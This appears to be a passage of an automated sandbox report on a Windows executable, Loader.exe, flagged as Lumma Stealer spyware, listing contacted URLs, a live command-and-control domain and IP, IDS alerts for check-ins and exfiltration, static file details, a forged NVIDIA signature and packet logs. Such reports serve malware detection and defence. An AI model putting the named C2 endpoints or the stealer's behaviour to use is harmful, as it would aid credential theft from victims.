https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.entrust.net/rpa03	Loader.exe	false		high
http://aia.entrust.net/ts1-chain256.cer01	Loader.exe	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cureprouderio.click/8D7Qw/Wo	Loader.exe, 00000003.00000003.2145796817.0000000005365000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cureprouderio.click/apiprog	Loader.exe, 00000003.00000003.2234239277.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2235053404.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	Loader.exe, 00000003.00000003.2145879555.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145718381.000000000535A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Loader.exe, 00000003.00000003.2121974309.00000000055F8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cureprouderio.click/;0	Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cureprouderio.click/c	Loader.exe, 00000003.00000003.2074388190.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cureprouderio.clic	Loader.exe, 00000003.00000003.2234239277.0000000002C56000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2234117510.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2149819598.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2171055409.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2235035160.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2150289757.0000000002C17000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	Loader.exe, 00000003.00000003.2122401956.000000000535C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cureprouderio.click/apiwn	Loader.exe, 00000003.00000003.2234239277.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2235053404.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	Loader.exe, 00000003.00000003.2145879555.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145718381.000000000535A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	Loader.exe, 00000003.00000003.2122401956.000000000535C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cureprouderio.click:443/api	Loader.exe, 00000003.00000003.2189776264.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	Loader.exe, 00000003.00000002.2235463947.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2170956786.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2189552535.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145879555.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2177005335.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145718381.000000000535A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cureprouderio.click/8D7Qw/WoB	Loader.exe, 00000003.00000003.2145695820.0000000005365000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145765606.0000000005365000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	Loader.exe	false		high
https://www.entrust.net/rpa0	Loader.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.132.7	cureprouderio.click	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581552
Start date and time:	2024-12-28 04:13:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Loader.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/1@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 52 Number of non-executed functions: 166
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
22:13:58	API Interceptor	8x Sleep call for process: Loader.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.132.7	https://francinecrowley.com/res444.php?4-68747470733a2f2f6a6247772e797a7675666e78632e72752f534e4e6766774f2f-#	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	Script.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	48.252.190.9.zip	Get hash	malicious	Unknown	Browse	104.21.95.219
	https://haleborealis.com	Get hash	malicious	Unknown	Browse	104.22.72.81
	External2.4.exe	Get hash	malicious	LummaC	Browse	104.21.29.252
	Aura.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	soft 1.14.exe	Get hash	malicious	Meduza Stealer	Browse	104.26.13.205
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.30.13
	https://www.dropbox.com/scl/fi/lncgsm76k7l5ix7fuu5t6/2024-OK-House-Outreach.pdf?rlkey=o4qr50zpdw1z14o6ikdg6zjt8&st=lrloyzlo&dl=0	Get hash	malicious	Unknown	Browse	172.67.216.74
	New Upd v1.1.0.exe	Get hash	malicious	LummaC	Browse	104.21.92.91

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
	Script.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
	Neverlose.cc-unpadded.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
	External2.4.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
	Aura.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
	Aura.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
	New Upd v1.1.0.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
	WonderHack.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
	Installer.exe	Get hash	malicious	LummaC	Browse	172.67.132.7

Dropped Files

⊘No context

Created / dropped Files

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\Loader.exe
File Type:	assembler source, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	14402
Entropy (8bit):	4.874636730022465
Encrypted:	false
SSDEEP:	384:vlICCmV5fTMzsM3qlICCmV5fTMzsM3ip9guFx2rBhiLfmfU:vGCC+dMOGCC+dMY9guFx2rBo
MD5:	DF0EFD0545733561C6E165770FB3661C
SHA1:	0F3AD477176CF235C6C59EE2EB15D81DCB6178A8
SHA-256:	A434B406E97A2C892FA88C3975D8181EBEA62A8DA919C5221409E425DF50FD17
SHA-512:	3FF527435BC8BCF2640E0B64725CC0DB8A801D912698D4D94C44200529268B80AA7B59A2E2A2EA6C4621E09AA249AAA3583A8D90E4F5D7B68E0E6FFFEB759918
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	AcquireSRWLockExclusive..AcquireSRWLockShared..ActivateActCtx..ActivateActCtxWorker..AddAtomA..AddAtomW..AddConsoleAliasA..AddConsoleAliasW..AddDllDirectory..AddIntegrityLabelToBoundaryDescriptor..AddLocalAlternateComputerNameA..AddLocalAlternateComputerNameW..AddRefActCtx..AddRefActCtxWorker..AddResourceAttributeAce..AddSIDToBoundaryDescriptor..AddScopedPolicyIDAce..AddSecureMemoryCacheCallback..AddVectoredContinueHandler..AddVectoredExceptionHandler..AdjustCalendarDate..AllocConsole..AllocateUserPhysicalPages..AllocateUserPhysicalPagesNuma..AppPolicyGetClrCompat..AppPolicyGetCreateFileAccess..AppPolicyGetLifecycleManagement..AppPolicyGetMediaFoundationCodecLoading..AppPolicyGetProcessTerminationMethod..AppPolicyGetShowDeveloperDiagnostic..AppPolicyGetThreadInitializationType..AppPolicyGetWindowingModel..AppXGetOSMaxVersionTested..ApplicationRecoveryFinished..ApplicationRecoveryInProgress..AreFileApisANSI..AssignProcessToJobObject..AttachConsole..BackupRead..BackupSeek..BackupWrite..B

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.568800602855412
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Loader.exe
File size:	572'456 bytes
MD5:	89c77bce077f8e9da11c4d6a6c496db1
SHA1:	43c62a61c90fb05dfdd19c871d9406b61e10d948
SHA256:	2f030fcc8d51309c46b8913109dbb5b6821d5b69da971962370d8470db1ad830
SHA512:	eb9a891dd4c500d439c00e01bf8700a311276e87cc89f69ae4e75b860c105ccbfc8d13e2ea61f1b10df985d608cbb95c0e7ecf623e7c1472c43edbfacb2cf21c
SSDEEP:	12288:fYO6Dqzihouxpa+yWFDLcV5snOOowFpo6igS1wEO:AO6DThou2+yZaL1i11wt
TLSH:	F4C4E1023690C4B3D5631A369979D7794A3EB8100F6256DBA3944FFECEB02C15F31A6E
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ng..........................................@.................................Ez....@.................................\|j..<..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4104a0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x676E98E6 [Fri Dec 27 12:09:10 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	96d90e8808da099bc17e050394f447e7

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	12/01/2023 19:00:00 16/01/2026 18:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
call 00007EFF5CDCB12Ah
jmp 00007EFF5CDCAF8Dh
mov ecx, dword ptr [0043B680h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007EFF5CDCB126h
test esi, ecx
jne 00007EFF5CDCB148h
call 00007EFF5CDCB151h
mov ecx, eax
cmp ecx, edi
jne 00007EFF5CDCB129h
mov ecx, BB40E64Fh
jmp 00007EFF5CDCB130h
test esi, ecx
jne 00007EFF5CDCB12Ch
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [0043B680h], ecx
not ecx
pop edi
mov dword ptr [0043B6C0h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [00436D00h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [00436CB8h]
xor dword ptr [ebp-04h], eax
call dword ptr [00436CB4h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [00436D50h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 0043CF48h
call dword ptr [00436D28h]
ret
push 00030000h
push 00010000h
push 00000000h
call 00007EFF5CDD1F03h
add esp, 0Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x36a7c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8e000	0x3fc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x89600	0x2628	.bss
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3f000	0x2744	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x32608	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2ea98	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x36c3c	0x184	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2b4ca	0x2b600	ebf84c6b836020b1a66433a898baeab7	False	0.5443702719740634	data	6.596404756541432	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2d000	0xc50c	0xc600	96e76e7ef084461591b1dcd4c2131f05	False	0.40260022095959597	data	4.741850626178578	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3a000	0x3714	0x2800	d87fd4546a2b39263a028b496b33108f	False	0.29814453125	data	5.024681407682101	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x3e000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x3f000	0x2744	0x2800	c7508b57e36483307c47b7dd73fc0c85	False	0.75166015625	data	6.531416896423856	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss	0x42000	0x4be00	0x4be00	2905805b4387a210b235477c32a7d7a2	False	1.0003249845551894	data	7.9993225818261315	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x8e000	0x3fc	0x400	4243bfa36d7c6187562be2edfa0b46c2	False	0.443359375	data	3.391431520369637	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x8e058	0x3a4	data	English	United States	0.44849785407725323

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThread, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

USER32.dll

ShowWindow

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-28T04:13:59.265947+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49708	172.67.132.7	443	TCP
2024-12-28T04:14:00.028753+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49708	172.67.132.7	443	TCP
2024-12-28T04:14:00.028753+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49708	172.67.132.7	443	TCP
2024-12-28T04:14:01.301951+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49709	172.67.132.7	443	TCP
2024-12-28T04:14:02.110528+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49709	172.67.132.7	443	TCP
2024-12-28T04:14:02.110528+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49709	172.67.132.7	443	TCP
2024-12-28T04:14:03.769915+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49710	172.67.132.7	443	TCP
2024-12-28T04:14:04.647437+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49710	172.67.132.7	443	TCP
2024-12-28T04:14:06.072098+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49711	172.67.132.7	443	TCP
2024-12-28T04:14:08.439165+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49712	172.67.132.7	443	TCP
2024-12-28T04:14:11.204433+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49713	172.67.132.7	443	TCP
2024-12-28T04:14:13.829357+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49714	172.67.132.7	443	TCP
2024-12-28T04:14:13.833616+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	49714	172.67.132.7	443	TCP
2024-12-28T04:14:17.467661+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49718	172.67.132.7	443	TCP
2024-12-28T04:14:18.223149+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49718	172.67.132.7	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 04:13:57.970557928 CET	49708	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:13:57.970675945 CET	443	49708	172.67.132.7	192.168.2.5
Dec 28, 2024 04:13:57.970834017 CET	49708	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:13:57.972125053 CET	49708	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:13:57.972168922 CET	443	49708	172.67.132.7	192.168.2.5
Dec 28, 2024 04:13:59.265860081 CET	443	49708	172.67.132.7	192.168.2.5
Dec 28, 2024 04:13:59.265947104 CET	49708	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:13:59.271572113 CET	49708	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:13:59.271615028 CET	443	49708	172.67.132.7	192.168.2.5
Dec 28, 2024 04:13:59.271821976 CET	443	49708	172.67.132.7	192.168.2.5
Dec 28, 2024 04:13:59.324774981 CET	49708	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:13:59.324860096 CET	49708	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:13:59.324939013 CET	443	49708	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:00.028759956 CET	443	49708	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:00.028848886 CET	443	49708	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:00.028944016 CET	49708	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:00.032772064 CET	49708	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:00.032804966 CET	443	49708	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:00.032820940 CET	49708	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:00.032826900 CET	443	49708	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:00.042105913 CET	49709	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:00.042160988 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:00.042258978 CET	49709	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:00.042558908 CET	49709	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:00.042576075 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:01.301860094 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:01.301950932 CET	49709	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:01.321100950 CET	49709	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:01.321129084 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:01.321357965 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:01.323096037 CET	49709	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:01.323160887 CET	49709	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:01.323174953 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:02.110479116 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:02.110529900 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:02.110554934 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:02.110583067 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:02.110590935 CET	49709	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:02.110613108 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:02.110627890 CET	49709	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:02.118793011 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:02.118860006 CET	49709	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:02.118869066 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:02.127182007 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:02.127228975 CET	49709	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:02.127235889 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:02.168709040 CET	49709	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:02.168716908 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:02.215574980 CET	49709	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:02.230133057 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:02.278076887 CET	49709	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:02.278096914 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:02.315207958 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:02.315248013 CET	49709	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:02.315254927 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:02.315264940 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:02.315320969 CET	49709	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:02.315329075 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:02.315354109 CET	443	49709	172.67.132.7	192.168.2.5
